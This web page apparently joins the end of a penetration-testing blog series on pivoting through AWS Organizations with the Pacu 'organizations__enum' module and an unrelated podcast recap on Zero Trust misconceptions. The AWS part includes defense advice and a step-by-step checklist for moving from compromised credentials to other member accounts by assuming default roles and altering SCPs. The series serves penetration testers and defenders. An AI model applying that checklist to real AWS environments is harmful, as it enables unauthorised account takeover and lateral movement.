Enumeration Tool for AWS Organizations

A lot of what I covered is based off AWS Organization enumeration. If you compromise an AWS account, you will want to list all organization-related entities to understand the landscape for delegation and the general organization structure (assuming your account is even in an organization).  

To better assist in pentesting AWS Organizations, I added AWS Organizations support to the open-source AWS pentesting tool Pacu. I also wrote an additional Pacu enumeration module for AWS Organizations (organizations__enum). These changes were recently accepted into the Pacu GitHub project and are also available in the traditional pip3 installation procedure detailed in the repository’s README. The two relevant forks are located here:

Note that the GitHub Pacu project contains all APIs discussed thus far, but as you might note in the screenshots below, the pip installation just does not include 1 read-only API (describe-resource-policy) along with 1-2 bug fixes at this time.

I won’t cover how Pacu works as there is plenty of documentation for the tool, but I will run my module from the perspective of a management account and a normal (not a delegated administrator) member account.  

Let’s first run Pacu with respect to Account A. Note that the module collects many associated attributes ranging from a general organization description to delegation data. To see the collected data after running “organizations__enum,” you need to execute “data organizations.” My module also tries to build a visual graph at the end of the enumeration using the account.

Figure 9: Gather Organization Data from Account A
Figure 9: Gather Organization Data from Account A
Figure 10: Data Gathered from Account A
Figure 10: Data Gathered from Account A
Figure 11: View Organization Data & Graph from Account A
Figure 11: View Organization Data & Graph from Account A

At the other extreme, what if the account in question is a member account with no associated delegation? In this case, the module will still pick up the general description of the organization but will not dump all the organization data since your credentials do not have the necessary API permissions. At the very least, this would help tell you at a glance if the account in question is part of an organization. 

Figure 12: Gather Organization Data from Account B
Figure 12: Gather Organization Data from Account B
Figure 13: Data Gathered from Account B
Figure 13: Data Gathered from Account B

Defense

The content discussed above is not any novel zero-days or represents an inherent flaw in AWS itself. The root cause of most of these problems is exposed cleartext credentials and lack of least privilege. The cleartext credentials give an attacker access to the AWS account, with the trusted access and delegated administration allowing for easy pivoting.  

As mentioned in part one, consider a layered defense. Ensure that IAM users/roles adhere to a least privilege methodology, and that organization-integrated features are also monitored and not enabled if not needed. In all cases, protect AWS credentials to avoid access to the AWS environment allowing someone to enumerate the existing resources using a module like the Pacu one above, and subsequently exploit any pivoting vectors. To get a complete picture of the organization’s actions, ensure proper logging is in place as well. 

The following AWS articles provide guidance pertaining to the points discussed above. Or connect with NetSPI to learn how an AWS penetration test can help you uncover areas of misconfiguration or weakness in your AWS environment.  

Final Thoughts & Conclusion

The architecture and considerable number of enabled/delegated service possibilities in AWS Organizations presents a serious vector for lateral movement within corporate environments. This could easily turn a single AWS account takeover into a multiple account takeover that might cross accepted software deployment boundaries (i.e. pre-production & production). More importantly, a lot of examples given above assume you have compromised a single user or role that allowed for complete control over a given AWS account. In reality, you might find yourself in a situation where permissions are more granular so maybe one compromised user/role has the permissions to enable a service, while another user/role has the permissions to call the enabled service on the organization, and so on.  

We covered a lot in this two-part series on pivoting clouds in AWS Organizations. To summarize the key learnings and assist in your own replication, here’s a procedural checklist to follow: 

  1. Compromise a set of AWS credentials for a user or role in the compromised AWS Account. 
  2. Try to determine if you are the management account, a delegated administrator account, a default member account, or an account not part of an organization. If possible, try to run the Pacu “organizations__enum” module to gather all necessary details in one command.
  3. If you are the management account, go through each member account and try to assume the default role. Consider a wordlist with OrganizationAccountAccessRole included. You can also try to leverage any existing enabled services with IAM Identity Center being the desired service. If necessary, you can also check if there are any delegated administrators you have control over that might assist in pivoting. 
  4. If you are a delegated administrator, check for associated delegated services to exploit similar to enabled services or try to alter existing SCPs to grant yourself or other accounts more permissions. If necessary, you can also check if there are any other delegated administrators you have control over that might assist in pivoting. 
Back

3 Misconceptions with Zero Trust Implementation

On Episode 46 of NetSPI’s Agent of Influence podcast, host and NetSPI Field Chief Information Security Officer (CISO) Nabil Hannan invited Hudl CISO Rob LaMagna-Reiter to discuss a future-focused approach to Zero Trust. They cover three misconceptions IT teams typically encounter throughout Zero Trust implementation, as well as broader topics including the definition of Zero Trust, reputable frameworks to reference, and long-term budgeting for an enhanced cybersecurity strategy. Read the recap below for the top takeaways, then head over to our podcast page to listen to the full episode. 

3 Misconceptions of Zero Trust Implementation 

One of the conversations on this episode centered around common misconceptions teams face when they plan for Zero Trust. The modern cybersecurity model presents universal challenges on the path to a greater end state of cybersecurity that can stall organizations on their progress. Help internal teams move beyond these common blockers and continue momentum on security initiatives by learning about the counterpoints to Zero Trust misconceptions. 

Misconception #1: Zero Trust is identity, or Zero Trust is the new perimeter. 

Truth: Identity is an important aspect of Zero Trust, but no singular pillar comprises Zero Trust.

The chatter around Zero Trust is dense, leading to mixed messages around what Zero Trust is and isn’t. Vendors can perpetuate this confusion by labeling products as Zero Trust or selling a one-and-done solution that promises relentless security. While identity is an important pillar in Zero Trust, it is only one aspect of the overarching strategy. Having too narrow a focus on a singular pillar leaves gaps in Zero Trust implementation, keeping your company at the crosshairs of a potential breach. 

Misconception #2: Zero Trust is a product. 

Truth: Zero Trust is a methodology to achieve a greater end state of cybersecurity.

Again, the varied messages about Zero Trust from vendors who sell a single solution dilute its meaning as an overall strategy. Zero Trust is not a product or a platform, and no single solution can achieve Zero Trust. It is a framework for organizations to approach more secure systems and align their internal thinking to systematiclly enhance security across many areas of a business. 

Misconception #3: Zero Trust is a complicated dream state that isn’t possible to achieve. 

Truth: Taking incremental steps toward Zero Trust by following a roadmap tailored to your organization decreases the intimidation of Zero Trust and provides quick wins to build momentum for continued progress.

This is the most common misnomer we hear in conversations. Zero Trust is complex, and when trying to solve for everything at once, it can seem overwhelming. Following a Zero Trust roadmap with relevant KPIs tailored to your organization is the key to success. This can include mapping out data flows, the attack surface, and building a strategy around identifying, classifying, and tagging critical applications.  

“The most complicated thing about Zero Trust is it actually forces you to understand your business deeply. It forces you to know more about the business than the business might know about itself.” 

– Rob LaMagna-Reiter, CISO at Hudl

While many misconceptions about Zero Trust exist, these three examples present nearly universal scenarios for any company aspiring to implement Zero Trust or continue its expansion. Zero Trust is a complex methodology, but internal teams can find support by partnering with technology vendors who specialize in cybersecurity. 

Plan for Zero Trust Implementation Guidance Tailored to Your Business Goals 

Zero Trust implementation uncovers what is normal and what isn’t for any business. This deep understanding allows for the creation of a strategy to guide the development of steps within Zero Trust, while remaining flexible to adapt to the business as it evolves.

Listen to the full interview on episode 46 of the Agent of Influence podcast where we expand on how to talk with internal stakeholders about Zero Trust in ways that resonate with them. If you’re ready to make progress on your Zero Trust implementation, contact NetSPI’s Strategic Advisory team to get started.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X